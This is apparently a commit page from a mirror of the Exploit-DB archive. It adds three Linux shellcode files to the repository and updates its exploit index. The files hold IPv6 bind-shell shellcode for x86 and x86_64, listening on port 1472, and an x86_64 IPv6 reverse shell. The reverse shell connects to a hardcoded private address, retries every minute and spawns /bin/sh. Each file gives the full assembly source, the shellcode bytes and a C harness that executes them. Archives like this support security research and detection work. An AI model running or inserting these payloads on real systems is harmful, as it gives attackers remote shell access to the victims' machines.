bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-05-08

Browse source 
3 new exploits

Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)

Linux x86_64 Shellcode - Bind TCP Port 1472 (ipv6)

Linux x86_64 Shellcode - Reverse TCP (ipv6)
This commit is contained in:
Offensive Security 2016-05-08 05:03:48 +00:00
parent 6fa97a6001
commit 69f4286492
4 changed files with 649 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -35939,6 +35939,7 @@ id,file,description,date,author,platform,type,port
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
@ -35969,10 +35970,12 @@ id,file,description,date,author,platform,type,port
39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0
39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,metasploit,linux,remote,8080
39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0
39758,platforms/lin_x86-64/shellcode/39758.c,"Linux x86_64 Shellcode - Bind TCP Port 1472 (ipv6)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80
39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80
39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - XSS",2016-05-04,"Johto Robbie",php,webapps,80
39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80
39763,platforms/lin_x86-64/shellcode/39763.c,"Linux x86_64 Shellcode - Reverse TCP (ipv6)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0
39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0

Can't render this file because it is too large.

195
platforms/lin_x86-64/shellcode/39758.c Executable file
View file

@ -0,0 +1,195 @@
/*
# Title : Linux x86_64 bind tcp : port 1472 ipv6
# Date : 02/05/2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
# Contact : shifath12@gmail.com
*/
/*
section .text
global _start
_start:
;;socket()
xor rax,rax
push 6
push 0x1
push 10
pop rdi
pop rsi
pop rdx
mov al,41 ;socket()
syscall
;------------------------------------
xor r15,r15
mov r15,rax ;storing socket descriptor
;--------------------
;fork()
xor rax,rax
mov al,57
xor rdi,rdi
syscall
;-------------------
xor rdi,rdi
cmp rax,rdi
je ps
;-------------
;exit()
xor rax,rax
mov al,60
syscall
;--------------
ps:
;----------------
;bind()
xor rax,rax
push byte 28
pop rdx ;sizeof struct sock_addrin6
push rax ;sin6_scope_id
push rax ;sin6_addr
push rax ;sin6_addr
push rax ;sin6_flowinfo
push word 0xc005 ;sin6_port (htons(1472)) (U may change it)
push word 10 ;sin6_family
push rsp
pop rsi
mov rdi,r15 ;scoket des
mov al,49
syscall
;---------------------------------------
;listen()
mov rdi,r15
xor rsi,rsi
add rsi,2
xor rax,rax
mov al,50
syscall
;------------------------------------
;accept()
xor r9,r9
xor rdx,rdx
xor rsi,rsi
xor rax,rax
mov rdi,r15
mov dl,28
mov al,43
syscall
;------------------
mov r9,rax ;storing client descriptor
;-------------------
;close() closing socket descriptor
xor rax,rax
mov rdi,r15
mov al,3
syscall
;------------------
;;dup2(cd,0)
xor rsi,rsi
mul rsi
mov rdi,r9
mov al,33
syscall
;------------
;------------------
;;dup2(cd,1)
xor rax,rax
inc rsi
mov rdi,r9
mov al,33
syscall
;------------
;------------------
;;dup2(cd,2)
xor rax,rax
inc rsi
mov rdi,r9
mov al,33
syscall
jmp exe
;------------
exe:
;exeve(//bin/sh)
xor rdx,rdx
xor rsi,rsi
xor rdi,rdi
mul rdi
mov r10, 0x68732f6e69622f2f
shr r10,8;shift right 8 bit
push r10
push rsp
pop rdi
mov al,59
syscall
*/
#include<stdio.h>
#include<string.h>
char shellcode[] ="\x48\x31\xc0\x6a\x06\x6a\x01\x6a\x0a\x5f\x5e\x5a\xb0\x29\x0f\x05\x4d\x31\xff\x49\x89\xc7\x48\x31\xc0\xb0\x39\x48\x31\xff\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\x48\x31\xc0\x6a\x1c\x5a\x50\x50\x50\x50\x66\x68\x05\xc0\x66\x6a\x0a\x54\x5e\x4c\x89\xff\xb0\x31\x0f\x05\x4c\x89\xff\x48\x31\xf6\x48\x83\xc6\x02\x48\x31\xc0\xb0\x32\x0f\x05\x4d\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xc0\x4c\x89\xff\xb2\x1c\xb0\x2b\x0f\x05\x49\x89\xc1\x48\x31\xc0\x4c\x89\xff\xb0\x03\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x4c\x89\xcf\xb0\x21\x0f\x05\xeb\x00\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\xf7\xe7\x49\xba\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xea\x08\x41\x52\x54\x5f\xb0\x3b\x0f\x05";
main()
{
printf("shellcode length %ld\n",(unsigned long)strlen(shellcode));
(* (int(*)()) shellcode) ();
return 0;
}

272
platforms/lin_x86-64/shellcode/39763.c Executable file
View file

@ -0,0 +1,272 @@
/*
# Title : Linux x86_64 reverse tcp (ipv6)
# Date : 04-05-2016
# Author : Roziul Hasan Khan Shifat
# Tested on : Ubuntu 14.04 LTS x86_64
*/
/*
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 6a 06 push 0x6
400085: 6a 01 push 0x1
400087: 6a 0a push 0xa
400089: 5f pop rdi
40008a: 5e pop rsi
40008b: 5a pop rdx
40008c: b0 29 mov al,0x29
40008e: 0f 05 syscall
400090: 48 31 db xor rbx,rbx
400093: 48 89 c3 mov rbx,rax
400096: 48 31 ff xor rdi,rdi
400099: 48 31 c0 xor rax,rax
40009c: b0 39 mov al,0x39
40009e: 0f 05 syscall
4000a0: 48 31 ff xor rdi,rdi
4000a3: 48 39 f8 cmp rax,rdi
4000a6: 74 07 je 4000af <connect>
4000a8: 48 31 c0 xor rax,rax
4000ab: b0 3c mov al,0x3c
4000ad: 0f 05 syscall
00000000004000af <connect>:
4000af: 48 31 d2 xor rdx,rdx
4000b2: 48 31 f6 xor rsi,rsi
4000b5: 48 f7 e6 mul rsi
4000b8: 56 push rsi
4000b9: 56 push rsi
4000ba: 56 push rsi
4000bb: 56 push rsi
4000bc: 56 push rsi
4000bd: c6 04 24 0a mov BYTE PTR [rsp],0xa
4000c1: 66 c7 44 24 02 05 c0 mov WORD PTR [rsp+0x2],0xc005
4000c8: 66 c7 44 24 12 ff ff mov WORD PTR [rsp+0x12],0xffff
4000cf: c7 44 24 14 c0 a8 d1 mov DWORD PTR [rsp+0x14],0x83d1a8c0
4000d6: 83
4000d7: 48 89 e6 mov rsi,rsp
4000da: b2 1c mov dl,0x1c
4000dc: 48 89 df mov rdi,rbx
4000df: b0 2a mov al,0x2a
4000e1: 0f 05 syscall
4000e3: 48 31 f6 xor rsi,rsi
4000e6: 48 39 f0 cmp rax,rsi
4000e9: 75 4b jne 400136 <try_again>
4000eb: 48 31 f6 xor rsi,rsi
4000ee: 48 f7 e6 mul rsi
4000f1: 48 89 df mov rdi,rbx
4000f4: b0 21 mov al,0x21
4000f6: 0f 05 syscall
4000f8: 48 31 c0 xor rax,rax
4000fb: 48 ff c6 inc rsi
4000fe: 48 89 df mov rdi,rbx
400101: b0 21 mov al,0x21
400103: 0f 05 syscall
400105: 48 31 c0 xor rax,rax
400108: 48 ff c6 inc rsi
40010b: 48 89 df mov rdi,rbx
40010e: b0 21 mov al,0x21
400110: 0f 05 syscall
400112: 48 31 f6 xor rsi,rsi
400115: 48 31 d2 xor rdx,rdx
400118: 48 f7 e2 mul rdx
40011b: 49 b8 2f 2f 2f 2f 2f movabs r8,0x6e69622f2f2f2f2f
400122: 62 69 6e
400125: 41 ba 2f 2f 73 68 mov r10d,0x68732f2f
40012b: 41 52 push r10
40012d: 41 50 push r8
40012f: 48 89 e7 mov rdi,rsp
400132: b0 3b mov al,0x3b
400134: 0f 05 syscall
0000000000400136 <try_again>:
400136: 48 31 f6 xor rsi,rsi
400139: 48 f7 e6 mul rsi
40013c: 56 push rsi
40013d: 6a 3c push 0x3c
40013f: 48 89 e7 mov rdi,rsp
400142: b0 23 mov al,0x23
400144: 0f 05 syscall
400146: e9 64 ff ff ff jmp 4000af <connect>
*/
/*
section .text
global _start
_start:
;;socket()
xor rax,rax
push 6
push 0x1
push 10
pop rdi
pop rsi
pop rdx
mov al,41 ;socket()
syscall
xor rbx,rbx
mov rbx,rax ;storing socket descriptor
xor rdi,rdi
xor rax,rax
mov al,57
syscall
xor rdi,rdi
cmp rax,rdi
je connect
xor rax,rax
mov al,60
syscall
;-----------------------------------------------------
;connect()
connect:
xor rdx,rdx
xor rsi,rsi
mul rsi
;----------------------------
;struct sockaddr_in6
push rsi
push rsi
push rsi
push rsi
push rsi
mov byte [rsp],10
mov word [rsp+2],0xc005
mov word [rsp+18],0xffff
mov dword [rsp+20],0x83d1a8c0 ;just change it. current ipv4 address inet_addr("192.168.209.131")
;-----------------------------
mov rsi,rsp
mov dl,28
mov rdi,rbx
mov al,42
syscall
xor rsi,rsi
cmp rax,rsi
jne try_again ;it will reconnect after 1 min , if it is failed to connect
;------------------------
;------------------
;;dup2(sd,0)
xor rsi,rsi
mul rsi
mov rdi,rbx
mov al,33
syscall
;------------
;------------------
;;dup2(sd,1)
xor rax,rax
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;------------------
;;dup2(sd,2)
xor rax,rax
inc rsi
mov rdi,rbx
mov al,33
syscall
;-----------------------
;;execve("/////bin//sh",NULL,NULL)
xor rsi,rsi
xor rdx,rdx
mul rdx
mov qword r8,'/////bin'
mov r10, '//sh'
push r10
push r8
mov rdi,rsp
mov al,59
syscall
;-----------------------------
try_again:
xor rsi,rsi
mul rsi
push rsi
push byte 60 ;1 min
mov rdi,rsp
mov al,35
syscall
jmp connect
;-----------------------------------
*/
#include<stdio.h>
#include<string.h>
char shellcode[] ="\x48\x31\xc0\x6a\x06\x6a\x01\x6a\x0a\x5f\x5e\x5a\xb0\x29\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xff\x48\x31\xc0\xb0\x39\x0f\x05\x48\x31\xff\x48\x39\xf8\x74\x07\x48\x31\xc0\xb0\x3c\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\xf7\xe6\x56\x56\x56\x56\x56\xc6\x04\x24\x0a\x66\xc7\x44\x24\x02\x05\xc0\x66\xc7\x44\x24\x12\xff\xff\xc7\x44\x24\x14\xc0\xa8\xd1\x83\x48\x89\xe6\xb2\x1c\x48\x89\xdf\xb0\x2a\x0f\x05\x48\x31\xf6\x48\x39\xf0\x75\x4b\x48\x31\xf6\x48\xf7\xe6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xf6\x48\x31\xd2\x48\xf7\xe2\x49\xb8\x2f\x2f\x2f\x2f\x2f\x62\x69\x6e\x41\xba\x2f\x2f\x73\x68\x41\x52\x41\x50\x48\x89\xe7\xb0\x3b\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xe9\x64\xff\xff\xff";
main()
{
printf("shellcode length %ld\n",(unsigned long)strlen(shellcode));
(* (int(*)()) shellcode) ();
return 0;
}

179
platforms/lin_x86/shellcode/39723.c Executable file
View file

@ -0,0 +1,179 @@
// # Title: linux x86 bind tcp 1472 port (ipv6)
// # Length : 1,250 bytes
// # Author : Roziul Hasan Khan Shifat
// # Tested On : kali linux 2.0 and Ubuntu 14.04 LTS
// # Contact : shifath12@gmail.com
/*
section .text
global _start
_start:
xor eax,eax
xor ebx,ebx
mov al,2 ;fork()
int 80h
xor ebx,ebx
cmp eax,ebx
je all
xor eax,eax
mov al,1
int 80h
all:
;;socket() ipv6
push 6
push 1
push 10
xor eax,eax
xor ebx,ebx
mov al,0x66
inc ebx
mov ecx,esp
int 0x80
;socket created
mov esi,eax ;storing socket des
xor eax,eax
;bind();;;
push DWORD eax
push DWORD eax
push DWORD eax
push DWORD eax
push eax ;sin6_addr
push WORD 0xc005 ;port 1472
push WORD 0x0a ;AF_inet
mov ecx,esp
push 0x1c
push ecx
push esi
xor ebx,ebx
mov bl,2
mov ecx,esp
mov al,0x66
int 80h
;;listen
xor eax,eax
xor ebx,ebx
push byte 2
push esi
mov ecx,esp
mov bl,4
mov al,102
int 80h
;;accept
xor ebx,ebx
push ebx
push ebx
push esi
mul ebx
mov bl,5
mov al,102
mov ecx,esp
int 80h
;;close()
mov ebx,esi
mov esi,eax ;storing client scoket des
xor eax,eax
mov al,6
int 80h
;dup2(sd,0)
xor ecx,ecx
mul ecx
mov ebx,esi
mov al,63
int 80h
;dup2(sd,1)
xor eax,eax
inc ecx
mov ebx,esi
mov al,63
int 80h
;dup2(sd,2)
xor eax,eax
inc ecx
mov ebx,esi
mov al,63
int 80h
;;execve(/bin//sh)
xor edx,edx
mul edx
push edx ;null terminated /bin//sh
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,11 ;execve()
int 0x80
*/
/*
to compile shellcode
$gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
$./shellcode
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x06\x31\xc0\xb0\x01\xcd\x80\x6a\x06\x6a\x01\x6a\x0a\x31\xc0\x31\xdb\xb0\x66\x43\x89\xe1\xcd\x80\x89\xc6\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x05\xc0\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x31\xdb\xb3\x02\x89\xe1\xb0\x66\xcd\x80\x31\xc0\x31\xdb\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xf7\xe3\xb3\x05\xb0\x66\x89\xe1\xcd\x80\x89\xf3\x89\xc6\x31\xc0\xb0\x06\xcd\x80\x31\xc9\xf7\xe1\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\x89\xf3\xb0\x3f\xcd\x80\x31\xd2\xf7\xe2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("shellcode length %ld",(long)strlen(shellcode));
(* (int(*)()) shellcode ) ();
}